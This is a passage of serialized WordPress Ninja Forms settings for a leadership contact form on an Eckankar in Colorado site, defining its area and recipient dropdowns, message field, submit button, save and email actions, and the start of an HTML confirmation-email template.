\"value\";s:0:\"\";}s:2:\"id\";i:191;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_73\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_73\";}s:2:\"id\";i:192;}i:6;a:2:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:5:\"hr_74\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:5:\"hr_74\";}s:2:\"id\";i:193;}i:7;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:30:\"Northwest Leadership Positions\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:189:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Leadership Positions</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:193:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Mountain Area Leadership Positions</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_75\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:30:\"Northwest Leadership Positions\";s:9:\"field_key\";s:7:\"html_75\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:194;}i:8;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:41:\"Select the person you would like to email\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_76\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:13:\"listselect_76\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:195;}i:9;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:11:\"textarea_77\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:11:\"textarea_77\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:196;}i:10;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800517759\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"630\";}i:11;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:9:\"submit_79\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:9:\"submit_79\";}s:2:\"id\";i:198;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:16\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:69;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:16\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_71}\";s:13:\"email_subject\";s:44:\"Northwest Colorado Leadership Communications\";s:13:\"email_message\";s:3714:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" 